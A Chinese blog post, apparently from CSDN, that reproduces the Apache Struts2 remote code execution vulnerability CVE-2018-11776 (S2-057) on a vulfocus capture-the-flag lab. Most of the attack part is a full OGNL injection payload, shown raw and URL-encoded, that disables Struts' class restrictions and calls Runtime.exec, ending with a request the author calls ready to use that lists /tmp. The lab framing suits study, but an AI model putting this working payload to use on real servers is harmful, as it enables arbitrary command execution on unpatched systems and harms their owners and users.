struts2 代码执行(CVE-2018-11776)漏洞复现 vulfocus夺旗

已于 2022-04-15 23:51:45 修改
阅读量4.5k 收藏 3
点赞数 1
分类专栏: 渗透测试 文章标签: 网络安全
于 2022-04-15 23:36:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mtc0527/article/details/124206264
版权

1、启动环境:直接vulfocus搜索cve编号启动,并访问环境ip地址
在这里插入图片描述

2、判断是否有漏洞:

  • 使用特定payload拼接url,访问抓包

ip地址/struts2-showcase/$%7B233*233%7D/actionChain1.action

  • 利用BurpSuite抓包并改包,Go得到下图所示结果,说明存在漏洞。可以看到,233X233的结果已经在Location头中返回
    在这里插入图片描述

3、构造POC,替换掉请求内容

原始poc:

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request[‘struts.valueStack’].context).(#cr=#ct[‘com.opensymphony.xwork2.ActionContext.container’]).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec(‘id’)).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

这里需要进行url编码:(自行url编码,不然会出错,我这只是样例)

%24%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B’struts.valueStack’%5D.context).(%23cr%3D%23ct%5B’com.opensymphony.xwork2.ActionContext.container’%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec(‘id’)).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D

4、可以看到执行的命令和对应的内容

在这里插入图片描述

5、替换执行的内容为ls%20/tmp就可以夺得flag

在这里插入图片描述

完成poc(编码之后,可直接食用):

/struts2-showcase/%24%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B'struts.valueStack'%5D.context).(%23cr%3D%23ct%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec('ls%20/tmp')).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action
Cherish__man
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057(CVE-2018-11776
qq_51577576的博客
12-10 552
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-057(CVE-2018-11776漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。
远程执行代码漏洞(CVE-2018-0886)漏洞修复
08-21
**远程执行代码漏洞(CVE-2018-0886)详解及修复** 远程执行代码漏洞(Remote Code Execution,RCE)是网络安全领域的一个重要话题,它指的是攻击者利用软件中的漏洞,在未经用户授权的情况下,能够在目标系统上执行...
Struts2-057/CVE-2018-11776两个版本RCE漏洞分析(含EXP)
weixin_34163741的博客
12-31 154
0x01 前言 2018年8月22日,Apache Strust2发布最新安全公告,Apache Struts2存在远程代码执行的高危漏洞(S2-057/CVE-2018-11776),该漏洞由Semmle Security Research team的安全研究员Man YueMo发现。该漏洞是由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置...
struts2 代码执行CVE-2018-11776
最新发布
ANOrange的博客
04-11 445
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。action元素没有设置名称空间属性,或者使用了通配符名称空间将由用户从ui传递并解析为OGNL表达式,最终导致远程代码执行漏洞.
Apache struts2 namespace远程命令执行CVE-2018-11776(S2-057)漏洞复现
浅浅的博客
07-28 3087
Apache struts2 namespace远程命令执行CVE-2018-11776(S2-057)漏洞复现 一、漏洞描述 S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码以及系统命令到服务器系统中去。 二、漏洞影响版本 Apache Strut...
vulhub】structs2远程命令执行 CVE-2018-11776(S2-057)
weixin_42884199的博客
12-06 500
前提 1、alwaysSelectFullNamespace被设置为true,此时namespace的值是从URL中获取的。URL是可控的,所以namespace也是可控的。 2、action元素没有名称空间属性集,或者使用通配符。该名称空间将由用户从URL传递并解析为OGNL表达式,最终导致远程代码执行的脆弱性。 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload URL: http://192.168.150.146:8080/s
漏洞解析及复现CVE-2018-11776
zkaqlaoniao的博客
10-29 380
Struts2是一款基于Java开发的框架,web路径下会出现两种特殊的文件格式,即*.action文件与*.jsp文件;它是基于MVC设计模式的Web应用框架,相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。由于在Struts2开发框架中使用namespace功能定义XML配置时,namespace值未被设置且在上层动作配置(Action Configuration)中未设置或用通配符namespace,可能导致远程代码执行
远程代码执行漏洞(CVE-2018-11776)
锋刃科技的博客
07-01 3536
影响版本 Struts <= Struts 2.3.34, Struts 2.5.16 环境搭建 启动Struts 2.3.34环境: docker-compose up -d 启动环境后,访问http://your-ip: 8080/show/,您将看到Struts2测试页面。 漏洞利用 利用 S2-057要求具备以下条件: action元素没有设置名称空间属性,或者使用了通配符 名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
2. CVE-2018-15473:这个漏洞涉及到OpenSSH的公钥认证过程。如果攻击者能够操纵公钥文件的顺序,他们可能可以绕过特定的认证限制,从而获取未经授权的访问权限。 3. CVE-2018-15919:这是一个输入验证错误,可能...
struts2-action间跳转及间传值
shannonlee的专栏
01-07 1346
通过设置action的返回result类型为action来跳转其他action,同时,通过parms参数传值 package com.zzn.action; import org.apache.struts2.convention.annotation.Result; import org.apache.struts2.convention.annotation.Results; i
S2—057 远程命令执行漏洞CVE-2018-11776
Stephen Wolf
11-23 1848
一、漏洞描述: Apache wiki更新了一个Struts2的远程代码执行漏洞(S2-057),漏洞威胁等级为高危,漏洞对应的CVE编号为CVE-2018-11776。 定义XML配置时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值...
Struts2 S2-057 远程代码执行漏洞(CVE-2018-11776)
锋刃科技的博客
06-30 773
影响环境 Struts<= Struts 2.3.34, Struts 2.5.16 环境搭建 cd vulhub/struts2/s2-057 docker-compose up -d 启动环境后,访问http://your-ip: 8080/show/,您将看到Struts2测试页面。 利用 S2-057要求具备以下条件: action元素没有设置名称空间属性,或者使用了通配符 名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。 Pa..
linux struts2漏洞,Struts 2 远程代码执行漏洞CVE-2018-11776
weixin_33603656的博客
05-16 148
Struts 2 远程代码执行漏洞(CVE-2018-11776)发布日期:2018-08-22更新日期:2018-08-28受影响系统:Apache Group Struts2 2.5.0 - 2.5.16Apache Group Struts2 2.3.0 - 2.3.34描述:BUGTRAQ ID: 105125CVE(CAN) ID: CVE-2018-11776Apache Strut...
Linux kernel(CVE-2018-17182)提权漏洞复现
06-12
为了避免对网络安全造成不必要的威胁,我无法提供具体的漏洞复现步骤。但是,我可以简单地描述一下CVE-2018-17182漏洞的一般性质和可能的攻击方式。 CVE-2018-17182是Linux内核中的一种提权漏洞,攻击者可以利用该漏洞以root权限在系统中执行任意代码。这个漏洞的原因是一个名为"Race Condition"(竞争条件)的问题,通过在内核中利用这个问题,攻击者可以覆盖内核内存中的关键数据结构,以此来控制系统的行为。 攻击者可以通过构造恶意的程序或者利用已存在的软件漏洞来利用该漏洞。因此,为了保护系统的安全,我们应该尽可能保持系统和软件的更新,并采取一系列的安全措施,例如限制用户的权限、使用安全的密码策略等等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值